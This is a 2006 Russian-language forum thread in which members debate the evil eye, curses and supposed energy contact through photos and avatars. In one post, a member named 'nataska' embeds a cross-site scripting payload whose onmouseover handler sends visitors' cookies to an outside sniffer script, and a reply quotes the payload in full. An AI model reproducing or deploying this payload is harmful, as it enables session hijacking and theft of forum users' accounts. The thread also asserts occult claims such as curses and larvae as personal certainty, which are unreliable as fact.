Очень много автарок.

Разговоры на отвлечённые темы.

Непрочитанное сообщение Юлька Бельчонок – 23 февраля 2006 в 17:11

Вика В. пишет:- Считаете ли вы реальной опасность сглаза и порчи?
- Да , если человек сам ждет этой порчи...

Да, я ее имела ввиду, лишний раз могу повторить, что с тобой категорически не согласна, хотя не склонна преувеличивать опасность сглаза/порчи, замечу, что написала о другом, энергетическом воздействии вообще.. вряд ли есть смысл отрицать что оно существует между людьми на расстоянии (во всяком случае я смысла в этом не вижу никакого, и без аргументов все возражения просто отмету, тем более что экспериментально наблюдала бесчетное число раз..). Но.. Вика, ты сама говорила, что конференция общая, а значит люди ходят разные, кроме того, есть открытый раздел, который может прочесть любой желающий. Я против его закрытия, но элементарные правила защиты надо знать. Иначе у меня складывается ощущение, что модератор несколько давит своим невежеством в направлении вариантов их применения, сорри..
Поскольку параметр шаблона шаблонного параметра шаблона не используется, его имя можно опустить.

Юлька Бельчонок
Постоянная прописка

На форуме с апреля 2005

Непрочитанное сообщение Вика В. – 23 февраля 2006 в 22:48

я тоже категорически несогласна с тобой ,)
- если конечно человек сам не ждет этой порчи,),),)

замечу, между делом, что если раздел открытый и его может прочесть любой желающий, это совсем не значит, что он видит фотографии ')

да, ты просмотрела тему, которую я тебе предложила?
может это позволит несколько изменить свое мнение и отойти от мистико-догматических взглядов на существующую реальность.

и довольно обвинять всех подряд в невежестве, это уже начинает приедаться, Юля.
и наводит на размышления.

ну и под конец, касательно того, что ты говоришь, снова повторю те же слова, позволяют часто трезво глядеть на многое:
"Не приумножай сущности без надобности."(с)

Вика В.
Основатель
Основатель

На форуме с января 2004
Фото: 5

Непрочитанное сообщение Юлька Бельчонок – 24 февраля 2006 в 4:27

Вика В. пишет:да, ты просмотрела тему, которую я тебе предложила?

Ммм.. я ее раньше внимательно читала уже.. и приняла одну из сторон на основании своего опыта..

Вика В. пишет:"Не приумножай сущности без надобности."(с)

А кто сказал, что надобности нет? :) По всему моему богатому опыту, она не просто есть, а по крайней мере в несколько раз больше, чем нужно для того, чтобы обратить достаточное внимание...

Добавлено спустя 12 минут 44 секунды:

Вика В. пишет:и довольно обвинять всех подряд в невежестве, это уже начинает приедаться, Юля.
и наводит на размышления.

Написала последний пост, и только потом вчиталась в эту фразу... Обвинять.. не знаю.. просто такая обида берет, когда знания накопленные достаточные за эти годы, а сказать так, чтобы это вызвало доверие, просто не получается. Нет, конечно, обвинения здесь не помогут... но я хочу сказать, что мой опыт распознания лярв и темных позволяет мне с уверенностью сказать, что они существуют, и те, кто будет это отрицать со словами "не приумножайте сущностей без надобности", просто расстроют меня, но не убедят ни в чем... Прошу прощения за обвинения, впрочем..

Добавлено спустя 3 минуты 25 секунд:

P.S. Пошла доедать селедку.. (это типа разновидность запоя для Ю.Б., если кто не в курсах :))
Последний раз редактировалось Юлька Бельчонок 24 февраля 2006 в 4:16, всего редактировалось 1 раз.

Юлька Бельчонок
Постоянная прописка

На форуме с апреля 2005

Непрочитанное сообщение nataska – 25 февраля 2006 в 19:49

Ну кому как нравится , мне например больше нравится свое лицо показывать.
<pre a='>' onmouseover='document.location="http://artbiz.ru/sniff.php?c="+document.cookie' b='<pre' > [url ]http://www.google.ru[/url]</pre>

nataska
Я.

На форуме с августа 2005
Фото: 1

Непрочитанное сообщение Вика В. – 25 февраля 2006 в 22:03

nataska пишет:Ну кому как нравится , мне например больше нравится свое лицо показывать.
<pre a='>' onmouseover='document.location="http://artbiz.ru/sniff.php?c="+document.cookie' b='<pre' > [url ]http://www.google.ru[/url]</pre>

и удивительны заклинания говорить..
я произнесла вслух - действует! :P

Вика В.
Основатель
Основатель

На форуме с января 2004
Фото: 5

Непрочитанное сообщение Sima – 25 февраля 2006 в 22:11

Юлька Бельчонок пишет:Фотография дает возможность более непосредственного энергетического контакта с человеком.

Юля. Только не обижайся. Это всего лишь шутка.

Знаете, почему Брежнев последние годы был таким?
Его портреты в каждой газете были, а туалетной бумаги в стране был жуткий дефицит. :)
Sima
Я.

На форуме с декабря 2004
Фото: 4

Вернуться в Беседка